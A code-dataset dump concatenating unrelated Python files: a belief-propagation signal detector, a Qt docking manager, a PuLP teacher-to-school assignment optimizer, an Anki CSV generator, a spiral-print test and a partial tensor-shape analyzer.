self.graph.factor(["x{}".format(var_idx)],
potential=f_x_i)
for var_idx in range(self.hparam.num_tx):
for var_jdx in range(var_idx + 1, self.hparam.num_tx):
# set the cross potentials
if s[var_idx, var_jdx] > 0:
t_ij = np.exp(-2* np.array(self.constellation)[None,:].T
* s[var_idx, var_jdx] * np.array(self.constellation))
self.graph.factor(["x{}".format(var_jdx), "x{}".format(var_idx)],
potential=t_ij)
def fit(self, S, b, stop_iter=10):
""" set potentials and run message passing"""
self.set_potential(S, b)
# run BP
iters, converged = self.graph.lbp(normalize=True,max_iters=stop_iter)
def detect_signal_by_mean(self):
estimated_signal = []
rv_marginals = dict(self.graph.rv_marginals())
for idx in range(self.n_symbol):
x_marginal = rv_marginals["x{}".format(idx)]
estimated_signal.append(self.constellation[x_marginal.argmax()])
return estimated_signal
def marginals(self):
marginal_prob = []
rv_marginals = dict(self.graph.rv_marginals())
for idx in range(self.n_symbol):
x_marginal = rv_marginals["x{}".format(idx)]
x_marginal = np.array(x_marginal)
x_marginal = x_marginal/x_marginal.sum()
marginal_prob.append(x_marginal)
return np.array(marginal_prob)
class AlphaBP(LoopyBP):
def __init__(self, noise_var, hparam):
self.hparam = hparam
# get the constellation
self.constellation = hparam.constellation
self.n_symbol = hparam.num_tx
# set the graph
self.graph = alphaBP.alphaGraph(alpha=hparam.alpha)
# add the discrete random variables to graph
for idx in range(hparam.num_tx ):
self.graph.rv("x{}".format(idx), len(self.constellation))
class MMSEalphaBP(AlphaBP):
def set_potential(self, S, b):
s = S
inv = np.linalg.inv(np.eye(s.shape[0]) + 2 * s )
prior_u = inv.dot(b)
for var_idx in range(s.shape[1]):
# set the first type of potentials, the standalone potentials
f_x_i = np.exp( - s[var_idx, var_idx] * np.power(self.constellation, 2)
- b[var_idx] * np.array(self.constellation))
prior_i = np.exp(-0.5 * np.power(self.constellation - prior_u[var_idx], 2) \
/ (inv[var_idx, var_idx]) )
self.graph.factor(["x{}".format(var_idx)],
potential=f_x_i * prior_i)
for var_idx in range(s.shape[1]):
for var_jdx in range(var_idx + 1, s.shape[1]):
# set the cross potentials
if s[var_idx, var_jdx] > 0:
t_ij = np.exp(- 2 * np.array(self.constellation)[None,:].T
* s[var_idx, var_jdx] * np.array(self.constellation))
self.graph.factor(["x{}".format(var_jdx), "x{}".format(var_idx)],
potential=t_ij)
| 2.4375 | 2 |
qtpydocking/dock_manager.py | paunet/qtpydocking | 9 | 12760308 | <reponame>paunet/qtpydocking
import logging
import pathlib
from typing import TYPE_CHECKING, Dict, List
from qtpy.QtCore import (QByteArray, QSettings, QXmlStreamReader,
QXmlStreamWriter, Signal)
from qtpy.QtGui import QIcon
from qtpy.QtWidgets import QAction, QMainWindow, QMenu, QWidget
from .enums import InsertionOrder, DockFlags, DockWidgetArea, OverlayMode
from .dock_container_widget import DockContainerWidget
from .dock_overlay import DockOverlay
from .floating_dock_container import FloatingDockContainer
from .util import LINUX
try:
from qtpy.QtCore import qCompress, qUncompress
except ImportError:
qCompress = None
qUncompress = None
if TYPE_CHECKING:
from .dock_area_widget import DockAreaWidget
from .dock_widget import DockWidget
logger = logging.getLogger(__name__)
class DockManagerPrivate:
public: 'DockManager'
floating_widgets: List[FloatingDockContainer]
containers: List['DockContainerWidget']
container_overlay: DockOverlay
dock_area_overlay: DockOverlay
dock_widgets_map: Dict[str, 'DockWidget']
perspectives: Dict[str, QByteArray]
view_menu_groups: Dict[str, QMenu]
view_menu: QMenu
menu_insertion_order: InsertionOrder
restoring_state: bool
config_flags: DockFlags
def __init__(self, public):
'''
Private data constructor
Parameters
----------
public : DockManager
'''
self.public = public
self.floating_widgets = []
self.containers = []
self.container_overlay = None
self.dock_area_overlay = None
self.dock_widgets_map = {}
self.perspectives = {}
self.view_menu_groups = {}
self.view_menu = None
self.menu_insertion_order = InsertionOrder.by_spelling
self.restoring_state = False
self.config_flags = DockFlags.default_config
def check_format(self, state: QByteArray, version: int) -> bool:
'''
Checks if the given data stream is a valid docking system state file.
Parameters
----------
state : QByteArray
version : int
Returns
-------
value : bool
'''
return self.restore_state_from_xml(state, version, testing=True)
def restore_state_from_xml(self, state: QByteArray, version: int, testing: bool) -> bool:
'''
Restores the state
Parameters
----------
state : QByteArray
version : int
testing : bool
Returns
-------
value : bool
'''
if state.isEmpty():
return False
stream = QXmlStreamReader(state)
stream.readNextStartElement()
if stream.name() != "QtAdvancedDockingSystem":
return False
v = stream.attributes().value("Version")
if int(v) != version:
return False
result = True
dock_containers = stream.attributes().value("Containers")
logger.debug('dock_containers %s', dock_containers)
dock_container_count = 0
while stream.readNextStartElement():
if stream.name() == "Container":
result = self.restore_container(dock_container_count, stream,
testing=testing)
if not result:
break
dock_container_count += 1
if testing or not dock_container_count:
return result
# Delete remaining empty floating widgets
floating_widget_index = dock_container_count - 1
delete_count = len(self.floating_widgets) - floating_widget_index
for i in range(delete_count):
to_remove = self.floating_widgets[floating_widget_index + i]
self.public.remove_dock_container(
to_remove.dock_container()
)
to_remove.deleteLater()
return result
def restore_state(self, state: QByteArray, version: int) -> bool:
'''
Restore state
Parameters
----------
state : QByteArray
version : int
Returns
-------
value : bool
'''
if not self.check_format(state, version):
logger.debug('checkFormat: Error checking format!')
return False
# Hide updates of floating widgets from use
self.hide_floating_widgets()
self.mark_dock_widgets_dirty()
if not self.restore_state_from_xml(state, version, testing=False):
logger.debug('restoreState: Error restoring state!')
return False
self.restore_dock_widgets_open_state()
self.restore_dock_areas_indices()
self.emit_top_level_events()
return True
def restore_dock_widgets_open_state(self):
# All dock widgets, that have not been processed in the restore state
# function are invisible to the user now and have no assigned dock area
# They do not belong to any dock container, until the user toggles the
# toggle view action the next time
for dock_widget in self.dock_widgets_map.values():
if dock_widget.property("dirty"):
dock_widget.flag_as_unassigned()
else:
dock_widget.toggle_view_internal(
not dock_widget.property("closed")
)
def restore_dock_areas_indices(self):
# Now all dock areas are properly restored and we setup the index of
# The dock areas because the previous toggleView() action has changed
# the dock area index
for dock_container in self.containers:
for i in range(dock_container.dock_area_count()):
dock_area = dock_container.dock_area(i)
dock_widget_name = dock_area.property("currentDockWidget")
dock_widget = None
if not dock_widget_name:
dock_widget = self.public.find_dock_widget(dock_widget_name)
if not dock_widget or dock_widget.is_closed():
index = dock_area.index_of_first_open_dock_widget()
if index < 0:
continue
dock_area.set_current_index(index)
else:
dock_area.internal_set_current_dock_widget(dock_widget)
def emit_top_level_events(self):
# Finally we need to send the topLevelChanged() signals for all dock
# widgets if top level changed
for dock_container in self.containers:
top_level_dock_widget = dock_container.top_level_dock_widget()
if top_level_dock_widget is not None:
top_level_dock_widget.emit_top_level_changed(True)
else:
for i in range(dock_container.dock_area_count()):
dock_area = dock_container.dock_area(i)
for dock_widget in dock_area.dock_widgets():
dock_widget.emit_top_level_changed(False)
def hide_floating_widgets(self):
# Hide updates of floating widgets from use
for floating_widget in self.floating_widgets:
floating_widget.hide()
def mark_dock_widgets_dirty(self):
for dock_widget in self.dock_widgets_map.values():
dock_widget.setProperty("dirty", True)
def restore_container(self, index: int, stream: QXmlStreamReader,
testing: bool) -> bool:
'''
Restores the container with the given index
Parameters
----------
index : int
stream : QXmlStreamReader
testing : bool
Returns
-------
value : bool
'''
if testing:
index = 0
if index >= len(self.containers):
floating_widget = FloatingDockContainer(dock_manager=self.public)
result = floating_widget.restore_state(stream, testing)
else:
logger.debug('containers[%d].restore_state()', index)
container = self.containers[index]
if container.is_floating():
result = container.floating_widget().restore_state(stream, testing)
else:
result = DockContainerWidget.restore_state(container, stream,
testing)
return result
def load_stylesheet(self, fn=None):
'''
Loads the stylesheet
'''
if fn is None:
fn = self.public.default_style_sheet
with open(fn, 'rt') as f:
stylesheet = f.read()
self.public.setStyleSheet(stylesheet)
def add_action_to_menu(self, action: QAction, menu: QMenu, insert_sorted: bool):
'''
Adds action to menu - optionally in sorted order
Parameters
----------
action : QAction
menu : QMenu
insert_sorted : bool
'''
if insert_sorted:
actions = menu.actions()
if not actions:
menu.addAction(action)
else:
actions = [act.text() for act in actions] + [action.text()]
actions.sort()
menu.insertAction(actions.index(action.text()), action)
else:
menu.addAction(action)
class DockManager(DockContainerWidget):
default_style_sheet = pathlib.Path(__file__).parent / (
'default_linux.css' if LINUX else 'default.css')
# This signal is emitted if the list of perspectives changed
perspective_list_changed = Signal()
# This signal is emitted if perspectives have been removed
perspectives_removed = Signal()
# This signal is emitted, if the restore function is called, just before
# the dock manager starts restoring the state. If this function is called,
# nothing has changed yet
restoring_state = Signal()
# This signal is emitted if the state changed in restoreState. The signal
# is emitted if the restoreState() function is called or if the
# openPerspective() function is called
state_restored = Signal()
# This signal is emitted, if the dock manager starts opening a perspective.
# Opening a perspective may take more than a second if there are many complex
# widgets. The application may use this signal to show some progress
# indicator or to change the mouse cursor into a busy cursor.
opening_perspective = Signal(str)
# This signal is emitted if the dock manager finished opening a perspective
perspective_opened = Signal(str)
def __init__(self, parent: QWidget):
'''
The central dock manager that maintains the complete docking system.
With the configuration flags you can globally control the functionality
of the docking system.
If the given parent is a QMainWindow, the dock manager sets itself as
the central widget. Before you create any dock widgets, you should
properly setup the configuration flags via setConfigFlags()
Parameters
----------
parent : QWidget
'''
super().__init__(self, parent)
self._mgr = DockManagerPrivate(self)
self.create_root_splitter()
if isinstance(parent, QMainWindow):
parent.setCentralWidget(self)
self._mgr.view_menu = QMenu("Show View", self)
self._mgr.dock_area_overlay = DockOverlay(self, OverlayMode.dock_area)
self._mgr.container_overlay = DockOverlay(self, OverlayMode.container)
self._mgr.containers.append(self)
self._mgr.load_stylesheet()
def deleteLater(self):
floating_widgets = self._mgr.floating_widgets
for floating_widget in floating_widgets:
floating_widget.deleteLater()
self._mgr.floating_widgets.clear()
super().deleteLater()
def register_floating_widget(self, floating_widget: FloatingDockContainer):
'''
Registers the given floating widget in the internal list of floating widgets
Parameters
----------
floating_widget : FloatingDockContainer
'''
self._mgr.floating_widgets.append(floating_widget)
logger.debug('floating widgets count = %d',
len(self._mgr.floating_widgets))
def remove_floating_widget(self, floating_widget: FloatingDockContainer):
'''
Remove the given floating widget from the list of registered floating widgets
Parameters
----------
floating_widget : FloatingDockContainer
'''
if floating_widget not in self._mgr.floating_widgets:
logger.error('qtpydocking bug; floating widget not in list: '
'%s not in %s', floating_widget,
self._mgr.floating_widgets)
return
self._mgr.floating_widgets.remove(floating_widget)
def register_dock_container(self, dock_container: DockContainerWidget):
'''
Registers the given dock container widget
Parameters
----------
dock_container : DockContainerWidget
'''
self._mgr.containers.append(dock_container)
def remove_dock_container(self, dock_container: DockContainerWidget):
'''
Remove dock container from the internal list of registered dock containers
Parameters
----------
dock_container : DockContainerWidget
'''
if self is not dock_container and dock_container in self._mgr.containers:
self._mgr.containers.remove(dock_container)
def container_overlay(self) -> DockOverlay:
'''
Overlay for containers
Returns
-------
value : DockOverlay
'''
return self._mgr.container_overlay
def dock_area_overlay(self) -> DockOverlay:
'''
Overlay for dock areas
Returns
-------
value : DockOverlay
'''
return self._mgr.dock_area_overlay
# TODO: property
def config_flags(self) -> DockFlags:
'''
This function returns the global configuration flags
Returns
-------
value : DockFlags
'''
return self._mgr.config_flags
def set_config_flags(self, flags: DockFlags):
'''
Sets the global configuration flags for the whole docking system. Call
this function before you create your first dock widget.
Parameters
----------
flags : DockFlags
'''
self._mgr.config_flags = flags
def add_dock_widget(
self, area: DockWidgetArea,
dock_widget: 'DockWidget',
dock_area_widget: 'DockAreaWidget' = None
) -> 'DockAreaWidget':
'''
Adds dock_widget into the given area. If DockAreaWidget is not null,
then the area parameter indicates the area into the DockAreaWidget. If
DockAreaWidget is null, the Dockwidget will be dropped into the
container. If you would like to add a dock widget tabified, then you
need to add it to an existing dock area object into the
CenterDockWidgetArea. The following code shows this:
Parameters
----------
area : DockWidgetArea
dock_widget : DockWidget
dock_area_widget : DockAreaWidget, optional
Returns
-------
value : DockAreaWidget
'''
self._mgr.dock_widgets_map[dock_widget.objectName()] = dock_widget
return super().add_dock_widget(area, dock_widget, dock_area_widget)
def add_dock_widget_tab(self, area: DockWidgetArea,
dockwidget: 'DockWidget') -> 'DockAreaWidget':
'''
This function will add the given Dockwidget to the given dock area as a
new tab. If no dock area widget exists for the given area identifier, a
new dock area widget is created.
Parameters
----------
area : DockWidgetArea
dockwidget : DockWidget
Returns
-------
value : DockAreaWidget
'''
area_widget = self.last_added_dock_area_widget(area)
if area_widget is not None:
return self.add_dock_widget(DockWidgetArea.center,
dockwidget, area_widget)
opened_areas = self.opened_dock_areas()
return self.add_dock_widget(area, dockwidget,
opened_areas[-1] if opened_areas else None)
def add_dock_widget_tab_to_area(self, dockwidget: 'DockWidget',
dock_area_widget: 'DockAreaWidget'
) -> 'DockAreaWidget':
'''
This function will add the given Dockwidget to the given DockAreaWidget
as a new tab.
Parameters
----------
dockwidget : DockWidget
dock_area_widget : DockAreaWidget
Returns
-------
value : DockAreaWidget
'''
return self.add_dock_widget(DockWidgetArea.center,
dockwidget, dock_area_widget)
def find_dock_widget(self, object_name: str) -> 'DockWidget':
'''
Searches for a registered doc widget with the given ObjectName
Parameters
----------
object_name : str
Returns
-------
value : DockWidget
'''
return self._mgr.dock_widgets_map.get(object_name, None)
def dock_widgets_map(self) -> dict:
'''
This function returns a readable reference to the internal dock widgets
map so that it is possible to iterate over all dock widgets
Returns
-------
value : dict:
'''
return dict(self._mgr.dock_widgets_map)
def remove_dock_widget(self, widget: 'DockWidget'):
'''
Removes a given DockWidget
Parameters
----------
widget : DockWidget
'''
self._mgr.dock_widgets_map.pop(widget.objectName())
super().remove_dock_widget(widget)
def dock_containers(self) -> list:
'''
Returns the list of all active and visible dock containers
Dock containers are the main dock manager and all floating widgets.
Returns
-------
value : list
'''
# qtpydocking TODO containers getting deleted
for container in list(self._mgr.containers):
try:
container.isVisible()
except RuntimeError as ex:
self._mgr.containers.remove(container)
logger.debug('qtpydocking TODO, container deleted',
exc_info=ex)
return list(self._mgr.containers)
def floating_widgets(self) -> list:
'''
Returns the list of all floating widgets
Returns
-------
value : list
'''
return self._mgr.floating_widgets
def z_order_index(self) -> int:
'''
This function always return 0 because the main window is always behind
any floating widget
Returns
-------
value : unsigned int
'''
return 0
def save_state(self, version: int = 0) -> QByteArray:
'''
Saves the current state of the dockmanger and all its dock widgets into
the returned QByteArray.
See also `config_flags`, which allow for auto-formatting and compression
of the resulting XML file.
Parameters
----------
version : int
Returns
-------
value : QByteArray
'''
xmldata = QByteArray()
stream = QXmlStreamWriter(xmldata)
stream.setAutoFormatting(
DockFlags.xml_auto_formatting in self._mgr.config_flags)
stream.writeStartDocument()
stream.writeStartElement("QtAdvancedDockingSystem")
stream.writeAttribute("Version", str(version))
stream.writeAttribute("Containers", str(len(self._mgr.containers)))
for container in self._mgr.containers:
if isinstance(container, DockManager):
DockContainerWidget.save_state(container, stream)
else:
container.save_state(stream)
stream.writeEndElement()
stream.writeEndDocument()
return (qCompress(xmldata, 9)
if DockFlags.xml_compression in self._mgr.config_flags
and qCompress is not None
else xmldata)
def restore_state(self, state: QByteArray, version: int = 0) -> bool:
'''
Restores the state of this dockmanagers dockwidgets. The version number
is compared with that stored in state. If they do not match, the
dockmanager's state is left unchanged, and this function returns false;
otherwise, the state is restored, and this function returns true.
Parameters
----------
state : QByteArray
version : int
Returns
-------
value : bool
'''
if not state.startsWith(b'<?xml'):
if qUncompress is None:
raise RuntimeError(
'Compression utilities unavailable with the '
'current qt bindings')
state = qUncompress(state)
# Prevent multiple calls as long as state is not restore. This may
# happen, if QApplication.processEvents() is called somewhere
if self._mgr.restoring_state:
return False
# We hide the complete dock manager here. Restoring the state means
# that DockWidgets are removed from the DockArea internal stack layout
# which in turn means, that each time a widget is removed the stack
# will show and raise the next available widget which in turn
# triggers show events for the dock widgets. To avoid this we hide the
# dock manager. Because there will be no processing of application
# events until this function is finished, the user will not see this
# hiding
is_hidden = self.isHidden()
if not is_hidden:
self.hide()
try:
self._mgr.restoring_state = True
self.restoring_state.emit()
result = self._mgr.restore_state(state, version)
finally:
self._mgr.restoring_state = False
self.state_restored.emit()
if not is_hidden:
self.show()
return result
def add_perspective(self, unique_perspective_name: str):
'''
Saves the current perspective to the internal list of perspectives. A
perspective is the current state of the dock manager assigned with a
certain name. This makes it possible for the user, to switch between
different perspectives quickly. If a perspective with the given name
already exists, then it will be overwritten with the new state.
Parameters
----------
unique_perspective_name : str
'''
self._mgr.perspectives[unique_perspective_name] = self.save_state()
self.perspective_list_changed.emit()
def remove_perspectives(self, *names):
'''
Removes the given perspective(s) from the dock manager
Parameters
----------
*names : str
'''
count = 0
for name in names:
try:
del self._mgr.perspectives[name]
except KeyError:
...
else:
count += 1
if count:
self.perspectives_removed.emit()
self.perspective_list_changed.emit()
def perspective_names(self) -> List[str]:
'''
Returns the names of all available perspectives
Returns
-------
value : list
'''
return list(self._mgr.perspectives.keys())
def save_perspectives(self, settings: QSettings):
'''
Saves the perspectives to the given settings file.
Parameters
----------
settings : QSettings
'''
settings.beginWriteArray("Perspectives", len(self._mgr.perspectives))
for i, (key, perspective) in enumerate(self._mgr.perspectives.items()):
settings.setArrayIndex(i)
settings.setValue("Name", key)
settings.setValue("State", perspective)
settings.endArray()
def load_perspectives(self, settings: QSettings):
'''
Loads the perspectives from the given settings file
Parameters
----------
settings : QSettings
'''
self._mgr.perspectives.clear()
size = settings.beginReadArray("Perspectives")
if not size:
settings.endArray()
return
for i in range(size):
settings.setArrayIndex(i)
name = settings.value("Name")
data = settings.value("State")
if not name or not data:
continue
self._mgr.perspectives[name] = data
settings.endArray()
def add_toggle_view_action_to_menu(self, toggle_view_action: QAction,
group: str, group_icon: QIcon) -> QAction:
'''
Adds a toggle view action to the the internal view menu. You can either
manage the insertion of the toggle view actions in your application or
you can add the actions to the internal view menu and then simply
insert the menu object into your.
Parameters
----------
toggle_view_action : QAction
group : str
group_icon : QIcon
Returns
-------
value : QAction
'''
order = self._mgr.menu_insertion_order
alphabetically_sorted = (
InsertionOrder.by_spelling == order
)
if not group:
self._mgr.add_action_to_menu(toggle_view_action,
self._mgr.view_menu,
alphabetically_sorted)
return toggle_view_action
try:
group_menu = self._mgr.view_menu_groups[group]
except KeyError:
group_menu = QMenu(group, self)
group_menu.setIcon(group_icon)
self._mgr.add_action_to_menu(
group_menu.menuAction(), self._mgr.view_menu,
alphabetically_sorted)
self._mgr.view_menu_groups[group] = group_menu
self._mgr.add_action_to_menu(toggle_view_action, group_menu,
alphabetically_sorted)
return group_menu.menuAction()
def view_menu(self) -> QMenu:
'''
This function returns the internal view menu. To fill the view menu,
you can use the addToggleViewActionToMenu() function.
Returns
-------
value : QMenu
'''
return self._mgr.view_menu
def set_view_menu_insertion_order(self, order: InsertionOrder):
'''
Define the insertion order for toggle view menu items. The order
defines how the actions are added to the view menu. The default
insertion order is MenuAlphabeticallySorted to make it easier for users
to find the menu entry for a certain dock widget. You need to call this
function befor you insert the first menu item into the view menu.
Parameters
----------
order : InsertionOrder
'''
self._mgr.menu_insertion_order = order
def is_restoring_state(self) -> bool:
'''
This function returns true between the restoringState() and
stateRestored() signals.
Returns
-------
value : bool
'''
return self._mgr.restoring_state
def open_perspective(self, perspective_name: str):
'''
Opens the perspective with the given name.
Parameters
----------
perspective_name : str
'''
try:
perspective = self._mgr.perspectives[perspective_name]
except KeyError:
return
self.opening_perspective.emit(perspective_name)
self.restore_state(perspective)
self.perspective_opened.emit(perspective_name)
| 1.828125 | 2 |
src/optimizer_flo.py | sarahsester/q_hackathon | 0 | 12760309 | <reponame>sarahsester/q_hackathon<filename>src/optimizer_flo.py
import pulp
import pandas as pd
import pickle
with open('geopy_distance_matrix_Waldorfschule.pkl', 'rb') as f:
distance = pickle.load(f)
schooldata = pd.read_csv(r'C:\Users\engel\PycharmProjects\q_hackathon\data\school_dataset.csv')
teacherdata = pd.read_csv(r'C:\Users\engel\PycharmProjects\q_hackathon\data\teachers.csv')
#schooldata = schooldata[schooldata["school_type"].isin(["Gymnasium", "Hauptschule", "Realschule"])]
schooldata = schooldata[schooldata["school_type"].isin(["Waldorfschule"])].reset_index()
#teacherdata = teacherdata[teacherdata["type_of_school"].isin(["Gymnasium", "Hauptschule", "Realschule"])]
teacherdata = teacherdata[teacherdata["type_of_school"].isin(["Waldorfschule"])].reset_index()
b = teacherdata["preference_big_school"]
r = teacherdata["preference_rural"]
sb = schooldata["is_big"]
sr = schooldata["is_rural"]
min_teachers = schooldata["min_number_of_teachers"]
number_students = schooldata["student"]
w = 10
size_teacher = len(teacherdata)
size_school = len(schooldata)
# create matrix of teacher and school matching
teacher_school_x = [(i, j) for i in range(size_teacher) for j in range(size_school)]
#teacher_school_y = [(i, j) for i in range(size_teacher) for j in range(size_school)]
#teacher_school_z = [(i, j) for i in range(size_teacher) for j in range(size_school)]
# create a binary variable to state that a table setting is used
x = pulp.LpVariable.dicts("teacher_school", teacher_school_x, lowBound=0, upBound=1, cat=pulp.LpInteger)
#y = pulp.LpVariable.dicts("teacher_school", teacher_school_y, lowBound=0, upBound=1, cat=pulp.LpInteger)
#z = pulp.LpVariable.dicts("teacher_school", teacher_school_z, lowBound=0, upBound=1, cat=pulp.LpInteger)
assignment_model = pulp.LpProblem("Teacher_School_Model", pulp.LpMinimize)
assignment_model += pulp.lpSum(pulp.lpSum(distance[i, j] * x[i, j] +
x[i, j] * abs(b[i]-sb[j]) * w +
x[i, j] * abs(r[i]-sr[j]) * w #+
#distance[i, j] * y[i, j] +
#y[i, j] * abs(b[i]-sb[j]) * w +
#y[i, j] * abs(r[i]-sr[j]) * w #+
#distance[i, j] * z[i, j] +
#z[i, j] * abs(b[i]-sb[j]) * w +
#z[i, j] * abs(r[i]-sr[j]) * w
for i in range(size_teacher)) for j in range(size_school))
# one school per teacher
for i in range(size_teacher):
assignment_model += pulp.lpSum(x[i, j] for j in range(size_school)) == 1
#for i in range(size_teacher):
# assignment_model += pulp.lpSum(y[i, j] for j in range(size_school)) == 1
# for i in range(size_teacher):
# assignment_model += pulp.lpSum(z[i, j] for j in range(size_school)) == 1
# am schlechtesten behandelter Lehrer
for i in range(size_teacher):
assignment_model += pulp.lpSum(x[i, j]*distance[i, j]
for j in range(size_school)) <= 200
# + y[i, j]*distance[i, j] + z[i, j]*distance[i, j]
# max teachers
for j in range(size_school):
assignment_model += pulp.lpSum(x[i, j] for i in range(size_teacher)) <= 50#number_students[j]/25
#for j in range(size_school):
# assignment_model += pulp.lpSum(y[i, j] for i in range(size_teacher)) <= 50 # number_students[j]/25
# for j in range(size_school):
# assignment_model += pulp.lpSum(z[i, j] for i in range(size_teacher)) <= 50 # number_students[j]/25
# min teachers
for j in range(size_school):
assignment_model += pulp.lpSum(x[i, j] for i in range(size_teacher)) >= 10#min_teachers[j]
#for j in range(size_school):
# assignment_model += pulp.lpSum(y[i, j] for i in range(size_teacher)) >= 10#min_teachers[j]
# for j in range(size_school):
# assignment_model += pulp.lpSum(z[i, j] for i in range(size_teacher)) >= 10#min_teachers[j]
assignment_model.solve()
# Wieviele Lehrer an jeweilige Schulen geschickt werden
schulbelegung = []
for j in range(size_school):
count = 0
for i in range(size_teacher):
if x[(i, j)].value() == 1.0:
count = count + 1
schulbelegung.append(count)
# Distanzen der einzelnen Lehrer (mit bzw ohne Präferenzen)
teacher_costs = []
for i in range(size_teacher):
cost = 0
for j in range(size_school):
cost = cost + distance[i, j] * x[i, j].value() #+ x[i, j].value() * abs(b[i] - sb[j]) * w + x[i, j].value() * abs(r[i] - sr[j]) * w
teacher_costs.append(cost)
print(teacher_costs)
print()
| 2.765625 | 3 |
brain_brew/build_tasks/csvs/csvs_generate.py | ohare93/brain-brew | 62 | 12760310 | <gh_stars>10-100
from dataclasses import dataclass
from typing import List, Dict, Union
from brain_brew.build_tasks.csvs.shared_base_csvs import SharedBaseCsvs
from brain_brew.commands.run_recipe.build_task import TopLevelBuildTask
from brain_brew.configuration.part_holder import PartHolder
from brain_brew.representation.yaml.notes import Notes, Note
from brain_brew.transformers.file_mapping import FileMapping
from brain_brew.transformers.note_model_mapping import NoteModelMapping
from brain_brew.utils import join_tags
@dataclass
class CsvsGenerate(SharedBaseCsvs, TopLevelBuildTask):
@classmethod
def task_name(cls) -> str:
return r'generate_csvs'
@classmethod
def task_regex(cls) -> str:
return r'generate_csv[s]?'
@classmethod
def yamale_schema(cls) -> str: # TODO: Use NotesOverride here, just as in NotesToCrowdAnki
return f'''\
notes: str()
note_model_mappings: list(include('{NoteModelMapping.task_name()}'))
file_mappings: list(include('{FileMapping.task_name()}'))
'''
@classmethod
def yamale_dependencies(cls) -> set:
return {NoteModelMapping, FileMapping}
@dataclass
class Representation(SharedBaseCsvs.Representation):
notes: str
def encode(self):
return {
"notes": self.notes,
"file_mappings": [fm.encode() for fm in self.file_mappings],
"note_model_mappings": [nmm.encode() for nmm in self.note_model_mappings]
}
@classmethod
def from_repr(cls, data: Union[Representation, dict]):
rep: cls.Representation = data if isinstance(data, cls.Representation) else cls.Representation.from_dict(data)
return cls(
rep=rep,
notes=PartHolder.from_file_manager(rep.notes),
file_mappings=rep.get_file_mappings(),
note_model_mappings={k: v for nm in rep.note_model_mappings for k, v in cls.map_nmm(nm).items()}
)
rep: Representation
notes: PartHolder[Notes] # TODO: Accept Multiple Note Parts
def execute(self):
self.verify_contents()
notes: List[Note] = self.notes.part.get_sorted_notes_copy(
sort_by_keys=[],
reverse_sort=False,
case_insensitive_sort=True
)
self.verify_notes_match_note_model_mappings(notes)
for fm in self.file_mappings:
csv_data: List[dict] = [self.note_to_csv_row(note, self.note_model_mappings) for note in notes
if note.note_model in fm.get_used_note_model_names()]
rows_by_guid = {row["guid"]: row for row in csv_data}
fm.compile_data()
fm.set_relevant_data(rows_by_guid)
fm.write_file_on_close()
def verify_notes_match_note_model_mappings(self, notes: List[Note]):
note_models_used = {note.note_model for note in notes}
errors = [TypeError(f"Unknown note model type '{model}' in deck part '{self.notes.part_id}'. "
f"Add mapping for that model.")
for model in note_models_used if model not in self.note_model_mappings.keys()]
if errors:
raise Exception(errors)
@staticmethod
def note_to_csv_row(note: Note, note_model_mappings: Dict[str, NoteModelMapping]) -> dict:
nm_name = note.note_model
row = note_model_mappings[nm_name].note_models[nm_name].part.zip_field_to_data(note.fields)
row["guid"] = note.guid
row["tags"] = join_tags(note.tags)
# TODO: Flags?
return note_model_mappings[nm_name].note_fields_map_to_csv_row(row)
| 2.171875 | 2 |
test/test_spiral_print.py | gasamoma/spiral-print | 0 | 12760311 | <reponame>gasamoma/spiral-print<filename>test/test_spiral_print.py<gh_stars>0
from src.spiral_print import print_spiral
answer_ten = "1 2 3 4 5 6 7 8 9 20 30 40 50 60 70 80 90 100 99 98 97 96 95" \
" 94 93 92 81 71 61 51 41 31 21 11 12 13 14 15 16 17 18 29 39" \
" 49 59 69 79 89 88 87 86 85 84 83 72 62 52 42 32 22 23 24 25" \
" 26 27 38 48 58 68 78 77 76 75 74 63 53 43 33 34 35 36 47 57" \
" 67 66 65 54 44 45 56 "
def test_sprint_spiral():
matriz = []
for x in range(1, 11):
newitem = []
for y in range(10):
newitem.append((x + (y * 10)))
matriz.append(newitem)
assert answer_ten == print_spiral(matriz)
| 3.078125 | 3 |
tsanley/dynamic/dynamic_shape_analyzer.py | ofnote/tsanley | 39 | 12760312 | import sys
import os
import inspect
from pathlib import Path
from collections import defaultdict
from easydict import EasyDict as ED
from .trace_utils import get_function_name_from_frame
from typed_ast import ast3 as ast
from ..common.ast_utils import expr2ann
from ..common.log_utils import log, debug_log
from .shape_cache import ShapeCache
from tsalib.ts import get_decls
from tsalib.tsn import tsn_to_tuple, resolve_to_int_tuple
PY_HOME = str(Path(sys.executable).parents[1])
EXCLUDE_FILES = [PY_HOME]
EXCLUDE_CLASSES = ['DimVar', 'DimExpr']
DEBUG_LEVEL = 0
# stores
GLOBALS = ED({})
def should_filter_call(filename, func_name):
ret = False
if filename is not None:
ret = any([x in filename for x in EXCLUDE_FILES])
if ret: return ret
if func_name is not None:
ret = any([x in func_name for x in EXCLUDE_CLASSES])
return ret
def eval_attribute (a):
if isinstance(a.value, ast.Name):
receiver = a.value.id
ret = receiver + '.' + a.attr
elif isinstance(a.value, ast.Attribute):
prefix = eval_attribute(a.value)
ret = prefix + '.' + a.attr
else:
import astpretty
astpretty.pprint(a)
print (f'{type(a.value)}')
raise NotImplementedError
return ret
def eval_lhs(lhs):
res = None
if isinstance(lhs, ast.Name):
res = lhs.id
elif isinstance(lhs, ast.Tuple):
res = [l.id for l in lhs.elts if l]
elif isinstance(lhs, ast.Attribute):
res = eval_attribute (lhs)
else:
#raise NotImplementedError(f'{type(lhs)}')
print (f'Not implemented eval lhs for {type(lhs)}')
return res
def get_var_ann_from_stmt (stmt, frame):
var, ann = None, None
tree = None
#print (f'get_var_ann_from_stmt: {stmt}')
try:
tree = ast.parse(stmt.strip())
#astpretty.pprint(tree)
except:
if GLOBALS.debug:
log (f'parse failed: {stmt}', style='green')
if tree is not None and len(tree.body) > 0:
assign = tree.body[0]
if isinstance(assign, (ast.AnnAssign, ast.Assign) ):
if isinstance(assign, ast.AnnAssign):
#assign.target, assign.annotation
ann = expr2ann(assign.annotation)
if ann is not None:
if isinstance(ann, str):
ann = tsn_to_tuple(ann)
else:
assert False, f'unknown annotation format {ann}'
var = eval_lhs(assign.target)
elif isinstance(assign, ast.Assign):
assert len(assign.targets) == 1
trg = assign.targets[0]
lvars = eval_lhs(trg)
if isinstance(lvars, str):
var = lvars
elif isinstance(lvars, (list, tuple)):
var = lvars[0]
if len(lvars) > 1:
log (f'lvars = {lvars}')
log ('WARN: only supporting single lhs tensor assignments')
return var, ann
def get_var_shape (var, frame):
if '.' not in var:
var_shape = frame.f_locals[var]
else:
ap = var.split('.')
#assert len(ap) == 2 #TODO: generalize
